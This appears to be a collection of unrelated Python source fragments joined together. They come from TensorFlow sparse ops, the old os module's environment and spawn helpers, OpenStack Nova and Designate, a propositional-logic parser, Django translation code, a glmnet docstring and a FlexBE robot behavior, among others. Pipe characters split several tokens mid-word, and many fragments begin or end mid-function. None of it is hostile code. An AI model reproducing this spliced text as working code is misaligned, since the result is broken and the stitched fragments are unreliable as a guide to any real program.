def _sparse_cross_internal(inputs,
hashed_output=False,
num_buckets=0,
hash_key=None,
name=None):
"""See gen_sparse_ops.sparse_cross."""
if not isinstance(inputs, list):
raise TypeError("Inputs must be a list")
if not all(
isinstance(i, sparse_tensor.SparseTensor) or isinstance(i, ops.Tensor)
for i in inputs):
raise TypeError("All inputs must be SparseTensors")
sparse_inputs = [
i for i in inputs if isinstance(i, sparse_tensor.SparseTensor)
]
dense_inputs = [
i for i in inputs if not isinstance(i, sparse_tensor.SparseTensor)
]
indices = [sp_input.indices for sp_input in sparse_inputs]
values = [sp_input.values for sp_input in sparse_inputs]
shapes = [sp_input.dense_shape for sp_input in sparse_inputs]
out_type = dtypes.int64 if hashed_output else dtypes.string
internal_type = dtypes.string
for i in range(len(values)):
if values[i].dtype != dtypes.string:
values[i] = math_ops.to_int64(values[i])
internal_type = dtypes.int64
for i in range(len(dense_inputs)):
if dense_inputs[i].dtype != dtypes.string:
dense_inputs[i] = math_ops.to_int64(dense_inputs[i])
internal_type = dtypes.int64
indices_out, values_out, shape_out = gen_sparse_ops.sparse_cross(
indices=indices,
values=values,
shapes=shapes,
dense_inputs=dense_inputs,
hashed_output=hashed_output,
num_buckets=num_buckets,
hash_key=hash_key or _DEFAULT_HASH_KEY,
out_type=out_type,
internal_type=internal_type,
name=name)
return sparse_tensor.SparseTensor(indices_out, values_out, shape_out)
def sparse_dense_cwise_add( |
# Change environ to automatically call putenv() if it exists
try:
# This will fail if there's no putenv
putenv
except NameError:
pass
else:
import UserDict
# Fake unsetenv() for Windows
# not sure about os2 here but
# I'm guessing they are the same.
if name in ('os2', 'nt'):
def unsetenv(key):
putenv(key, "")
if name == "riscos":
# On RISC OS, all env access goes through getenv and putenv
from riscosenviron import _Environ
elif name in ('os2', 'nt'): # Where Env Var Names Must Be UPPERCASE
# But we store them as upper case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
data = self.data
for k, v in environ.items():
data[k.upper()] = v
def __setitem__(self, key, item):
putenv(key, item)
self.data[key.upper()] = item
def __getitem__(self, key):
return self.data[key.upper()]
try:
unsetenv
except NameError:
def __delitem__(self, key):
del self.data[key.upper()]
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key.upper()]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key.upper(), *args)
def has_key(self, key):
return key.upper() in self.data
def __contains__(self, key):
return key.upper() in self.data
def get(self, key, failobj=None):
return self.data.get(key.upper(), failobj)
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
def copy(self):
return dict(self)
else: # Where Env Var Names Can Be Mixed Case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
self.data = environ
def __setitem__(self, key, item):
putenv(key, item)
self.data[key] = item
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
try:
unsetenv
except NameError:
pass
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key, *args)
def copy(self):
return dict(self)
environ = _Environ(environ)
def getenv(key, default=None):
"""Get an environment variable, return None if it doesn't exist.
The optional second argument can specify an alternate default."""
return environ.get(key, default)
__all__.append("getenv")
def _exists(name):
try:
eval(name)
return True
except NameError:
return False
# Supply spawn*() (probably only for Unix)
if _exists("fork") and not _exists("spawnv") and _exists("execv"):
P_WAIT = 0
P_NOWAIT = P_NOWAITO = 1
# XXX Should we support P_DETACH? I suppose it could fork()**2
# and close the std I/O streams. Also, P_OVERLAY is the same
# as execv*()?
def _spawnvef(mode, file, args, env, func):
# Internal helper; func is the exec*() function to use
pid = fork()
if not pid:
# Child
try:
if env is None:
func(file, args)
else:
func(file, args, env)
except:
_exit(127)
else:
# Parent
if mode == P_NOWAIT:
return pid # Caller is responsible for waiting!
| while | 1:
wpid, sts = waitpid(pid, 0)
if WIFSTOPPED(sts):
continue
elif WIFSIGNALED(sts):
return -WTERMSIG(sts)
elif WIFEXITED(sts):
return WEXITSTATUS(sts)
else:
raise error, "Not stopped, signaled or exited???"
def spawnv(mode, file, args):
"""spawnv(mode, file, args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execv)
def spawnve(mode, file, args, env):
"""spawnve(mode, file, args, env) -> integer
Execute file with arguments from args in a subprocess with the
specified environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execve)
# Note: spawnvp[e] is't currently supported on Windows
def spawnvp(mode, file, args):
"""spawnvp(mode, file, args) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execvp)
def spawnvpe(mode, file, args, env):
"""spawnvpe(mode, file, args, env) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execvpe)
if _exists("spawnv"):
# These aren't supplied by the basic Windows code
# but can be easily implemented in Python
def spawnl(mode, file, *args):
"""spawnl(mode, file, *args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return spawnv(mode, file, args)
def spawnle(mode, file, *args):
"""spawnle(mode, file, *args, env) -> integer
Execute file with arguments from |
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova i | mport exception
from nova import objects
from nova.objects import | base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
VERSION = '1.0'
fields = {
'id': fields.IntegerField(read_only=True),
'hypervisor': fields.StringField(),
'os': fields.StringField(),
'architecture': fields.StringField(),
'version': fields.StringField(),
'url': fields.StringField(),
'md5hash': fields.StringField(),
}
@staticmethod
def _from_db_object(context, agent, db_agent):
for name in agent.fields:
agent[name] = db_agent[name]
agent._context = context
agent.obj_reset_changes()
return agent
@base.remotable_classmethod
def get_by_triple(cls, context, hypervisor, os, architecture):
db_agent = db.agent_build_get_by_triple(context, hypervisor,
os, architecture)
if not db_agent:
return None
return cls._from_db_object(context, objects.Agent(), db_agent)
@base.remotable
def create(self, context):
updates = self.obj_get_changes()
if 'id' in updates:
raise exception.ObjectActionError(action='create',
reason='Already Created')
db_agent = db.agent_build_create(context, updates)
self._from_db_object(context, self, db_agent)
@base.remotable
def destroy(self, context):
db.agent_build_destroy(context, self.id)
@base.remotable
def save(self, context):
updates = self.obj_get_changes()
db.agent_build_update(context, self.id, updates)
self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('Agent'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context, hypervisor=None):
db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
return base.obj_make_list(context, cls(), objects.Agent, db_agents)
|
"""Describe the language syntax."""
import re
class Symbol:
"""Describes the language symbols."""
# General pattern of formulas
pattern = '([a-z0-9&\-\|><\(\)]*)'
accepted_chars = '([a-z0-9&\-\|><\(\)]*)'
def __init__(self, value):
"""Init a propositional symbol."""
self.value = value
@classmethod
def check(cls, symbol):
"""Check if the given arg is a symbol."""
regexp = re.compile(r'^%s$' % cls.pattern)
return regexp.match(symbol)
@classmethod
def accepts_initial_char(cls, char):
"""Check if the operator accepts the given char as initial char."""
regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
return regexp.match(char)
def is_a(self, cls):
"""Check if this token is a given type."""
return isinstance(self, cls)
def __str__(self):
"""Return the symbol value as str."""
return self.value
class PropositionalSymbol(Symbol):
"""
Describes the propositional symbols of the language.
The propositional symbols are represented by any
lowercase letter, followed or not by an integer index.
Examples:
p, p1, q23, r1890
"""
accepted_initial_char = '[a-z]'
pattern = '([a-z]{1}[0-9]*)'
def subformulas(self):
"""
Get the formula subformulas.
Return itself as it is a propositional symbol.
"""
return [self]
def str_representation(self):
"""String representation of the symbol."""
return self.value
def evaluate(self, symbol_values):
"""Evaluate symbol with given values."""
return symbol_values[self.str_representation()]
def count_terms(self):
"""Count the terms of the formula."""
return 1
class PontuationSymbol(Symbol):
"""
Describes the pontuation symbols of the language.
The pontuation symbols are represented by the
opening and closing parenthesis.
"""
pattern = '([\(\)])'
class OpeningParenthesis(PontuationSymbol):
"""Describes the opening parenthesis."""
accepted_initial_char = '\('
pattern = '\('
class ClosingParenthesis(PontuationSymbol):
"""Describes the closing parenthesis."""
accepted_initial_char = '\)'
pattern = '\)'
class Operator(Symbol):
| """Base class for language operators."""
class Associativity:
"""Possible operators associativity."""
LEFT | = 1
RIGHT = 0
def subformulas(self):
"""Get the formula subformulas."""
raise NotImplementedError
def evaluate(self, symbol_values):
"""Evaluate an operator with given values."""
raise NotImplementedError
def __str__(self):
"""Return the string representation as str."""
return self.str_representation()
class BinaryOperator(Operator):
"""Describe binary operators."""
def set_args(self, arg1, arg2):
"""Set the operator args."""
self.arg1 = arg1
self.arg2 = arg2
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its first and second args.
"""
return self.arg1.subformulas() + self.arg2.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol) or (
self.arg1.is_a(Operator) and
self.precendence <= self.arg1.precendence
):
# In this case do not need parenthesis
arg1_repr = self.arg1.str_representation()
else:
arg1_repr = '(' + self.arg1.str_representation() + ')'
if self.arg2.is_a(PropositionalSymbol) or (
self.arg2.is_a(Operator) and
self.precendence <= self.arg2.precendence
):
arg2_repr = self.arg2.str_representation()
else:
arg2_repr = '(' + self.arg2.str_representation() + ')'
return arg1_repr + self.SYMBOL + arg2_repr
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
"""Describe unary operators."""
def set_arg(self, arg):
"""Set the operator arg."""
self.arg1 = arg
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its arg.
"""
return self.arg1.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol):
return self.SYMBOL + self.arg1.str_representation()
else:
return self.SYMBOL + '(' + self.arg1.str_representation() + ')'
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
"""Describe the negation operator."""
SYMBOL = '-'
accepted_initial_char = '\-'
pattern = '\-'
precendence = 6
associativity = Operator.Associativity.RIGHT
def evaluate(self, symbol_values):
"""Evaluate a negation with given values."""
return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
"""Describe the conjunction operator."""
SYMBOL = '&'
accepted_initial_char = '&'
pattern = '&'
precendence = 5
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a conjunction with given values."""
return (self.arg1.evaluate(symbol_values) and
self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
"""Describe the disjunction operator."""
SYMBOL = '|'
accepted_initial_char = '\|'
pattern = '\|'
precendence = 4
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a disjunction with given values."""
return (self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
"""Describe the implication operator."""
SYMBOL = '->'
accepted_initial_char = '\-'
pattern = '\->'
precendence = 3
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate an implication with given values.
To do the trick: p -> q = -p | q
"""
return (not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
"""Describe the bi-implication operator."""
SYMBOL = '<->'
accepted_initial_char = '<'
pattern = '<\->'
precendence = 2
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate a bi-implication with given values.
To do the trick: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
"""
return (
not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values)
) and (
not self.arg2.evaluate(symbol_values) or
self.arg1.evaluate(symbol_values)
)
|
# -*- coding: utf-8 -*-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
'''
Cust | om MaximumIntensityProjectionGenerati | onAlgorithm for Generic TIFF Series
that makes sure that the first timepoint in a series is registered for
creation of the representative thumbnail.
'''
def __init__(self, datasetTypeCode, width, height, filename):
"""
Constructor
"""
# Call the parent base constructor
MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
datasetTypeCode, width, height, filename)
def imageToBeIgnored(self, image):
"""
Overrides the parent imageToBeIgnored method. The selection of which
series should be used to create the representative thumbnail is done
in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
to make a decision based on the timepoint (== 0), since we cannot know
which is the first time point in a Generic TIFF Series.
"""
return False
|
'''
Created on 17/2/2015
| @author: PC0 | 6
Primer cambio en el proyecto
'''
from include import app
if __name__ == '__main__':
app.run("127.0.0.1", 9000, debug=True) |
e on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower()+'_'+language[p+1:].lower()
else:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower()+'-'+locale[p+1:].lower()
else:
return locale.lower()
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset. Django uses a defined DEFAULT_CHARSET as the output charset on
Python 2.4. With Python 2.3, use DjangoTranslation23.
"""
def __init__(self, *args, **kw):
from django.conf import settings
gettext_module.GNUTranslations.__init__(self, *args, **kw)
# Starting with Python 2.4, there's a function to define
# the output charset. Before 2.4, the output charset is
# identical with the translation file charset.
try:
self.set_output_charset('utf-8')
except AttributeError:
pass
| self.django_output_charset = 'utf-8'
self.__language = '??'
def merge(self, other):
self._catalog.update(other._catalog)
def set_language(self, language):
self.__language = language
def language(self):
return self.__language
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslatio | n23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
return res.encode(self.django_output_charset)
def translation(language):
"""
Returns a translation object.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct a object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
global _translations
t = _translations.get(language, None)
if t is not None:
return t
from django.conf import settings
# set up the right translation class
klass = DjangoTranslation
if sys.version_info < (2, 4):
klass = DjangoTranslation23
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if settings.SETTINGS_MODULE is not None:
parts = settings.SETTINGS_MODULE.split('.')
project = import_module(parts[0])
projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
else:
projectpath = None
def _fetch(lang, fallback=None):
global _translations
loc = to_locale(lang)
res = _translations.get(lang, None)
if res is not None:
return res
def _translation(path):
try:
t = gettext_module.translation('django', path, [loc], klass)
t.set_language(lang)
return t
except IOError, e:
return None
res = _translation(globalpath)
# We want to ensure that, for example, "en-gb" and "en-us" don't share
# the same translation object (thus, merging en-us with a local update
# doesn't affect en-gb), even though they will both use the core "en"
# translation. So we have to subvert Python's internal gettext caching.
base_lang = lambda x: x.split('-', 1)[0]
if base_lang(lang) in [base_lang(trans) for trans in _translations]:
res._info = res._info.copy()
res._catalog = res._catalog.copy()
def _merge(path):
t = _translation(path)
if t is not None:
if res is None:
return t
else:
res.merge(t)
return res
for localepath in settings.LOCALE_PATHS:
if os.path.isdir(localepath):
res = _merge(localepath)
if projectpath and os.path.isdir(projectpath):
res = _merge(projectpath)
for appname in settings.INSTALLED_APPS:
app = import_module(appname)
apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
if os.path.isdir(apppath):
res = _merge(apppath)
if res is None:
if fallback is not None:
res = fallback
else:
return gettext_module.NullTranslations()
_translations[lang] = res
return res
default_translation = _fetch(settings.LANGUAGE_CODE)
current_translation = _fetch(language, fallback=default_translation)
return current_translation
def activate(language):
"""
Fetches the translation object for a given tuple of application name and
language and installs it as the current translation object for the current
thread.
"""
_active[currentThread()] = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
global _active
if currentThread() in _active:
del _active[currentThread()]
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active[currentThread()] = gettext_module.NullTranslations()
def get_language():
"""Returns the currently selected language."""
t = _active.get(currentThread(), None)
if t is not None:
try:
return to_language(t.language())
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
from django.conf import settings
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
False = left-to-right layout
True = right-to-left layout
"""
from django.conf import settings
base_lang = get_language().split('-')[0]
return base_lang in settings.LANGUAGES_BIDI
def catalog():
"""
Returns the current active catalog for further processing.
This can be used if you need to modify the catalog or want to access the
whole message catalog instead of just translating one string.
"""
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
return t
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
return _default
def do_tr |
def get_file_e | xtension(filename):
return filename.split(". | ")[-1]
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
def __init__(self, version, name):
self.raw_schema = utils.load_schema(version, name)
self.resolver = resolvers.LocalResolver.from_schema(
version, self.raw_schema)
if version in ['v2', 'admin']:
self.validator = validators.Draft4Validator(
self.raw_schema, resolver=self.resolver,
format_checker=format.draft4_format_checker)
else:
raise Exception('Unknown API version: %s' % version)
@property
def schema(self):
return self.validator.schema
@property
def properties(self):
return self.schema['properties']
@property
def links(self):
return self.schema['links']
@property
def raw(self):
return self.raw_schema
def validate(self, obj):
LOG.debug('Validating values: %r' % obj)
errors = []
for error in self.validator.iter_errors(obj):
errors.append({
'path': ".".join([str(x) for x in error.path]),
'message': error.message,
'validator': error.validator
})
if len(errors) > 0:
LOG.debug('Errors in validation: %r' % errors)
raise exceptions.InvalidObject("Provided object does not match "
"schema", errors=errors)
def filter(self, instance, properties=None):
if not properties:
properties = self.properties
filtered = {}
for name, subschema in list(properties.items()):
if 'type' in subschema and subschem | a['type'] == 'array':
subinstance = instance.get(name, None)
filtered[name] = self._filter_array(subinstance, subschema)
elif 'type' in subschema and subschema['type'] == 'object':
subinstance = instance.get(name, None)
properties = subschema['properties']
filtered[name] = self.filter(subinstance, pro | perties)
else:
filtered[name] = instance.get(name, None)
return filtered
def _filter_array(self, instance, schema):
if 'items' in schema and isinstance(schema['items'], list):
# NOTE(kiall): We currently don't make use of this..
raise NotImplementedError()
elif 'items' in schema:
schema = schema['items']
if '$ref' in schema:
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
properties = schema['properties']
return [self.filter(i, properties) for i in instance]
elif 'properties' in schema:
schema = schema['properties']
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
return [self.filter(i, schema) for i in instance]
else:
raise NotImplementedError('Can\'t filter unknown array type')
|
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
dataset from that evaluated on the on the (K-1)/K dataset.
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm. |
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and | then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
LICENSE: GPL-2
AUTHORS:
Algorithm was designed by Jerome Friedman, Trevor Hastie and Rob Tibshirani
Fortran code was written by Jerome Friedman
R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hasite
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
REFERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
matlabpool;
x=randn(1e3,100);
y=randn(1e3,1);
tic;
cvglmnet(x,y);
toc;
tic;
cvglmnet(x,y,[],[],[],[],[],true);
toc;
"""
import sys
import joblib
import multiprocessing
from glmnetSet import glmnetSet
from glmnetPredict import glmnetPredict
import scipy
from glmnet import glmnet
from cvelnet import cvelnet
from cvlognet import cvlognet
from cvmultnet import cvmultnet
from cvmrelnet import cvmrelnet
from cvfishnet import cvfishnet
def cvglmnet(*, x,
y,
family = 'gaussian',
ptype = 'default',
nfolds = 10,
foldid = scipy.empty([0]),
parallel = False,
keep = False,
grouped = True,
**options):
options = glmnetSet(options)
if 0 < len(options['lambdau']) < 2:
raise ValueError('Need more than one value of lambda for cv.glmnet')
nobs = x.shape[0]
# we should not really need this. user must supply the right shape
# if y.shape[0] != nobs:
# y |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, | PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
| class Init_SequenceSM(Behavior):
'''
Initialisation Sequence
'''
def __init__(self):
super(Init_SequenceSM, self).__init__()
self.name = 'Init_Sequence'
# parameters of this behavior
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:976 y:64, x:973 y:289
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:42 y:72
OperatableStateMachine.add('INIT HEAD',
SaraSetHeadAngle(pitch=0.4, yaw=0),
transitions={'done': 'repos'},
autonomy={'done': Autonomy.Off})
# x:205 y:72
OperatableStateMachine.add('repos',
RunTrajectory(file="repos", duration=0),
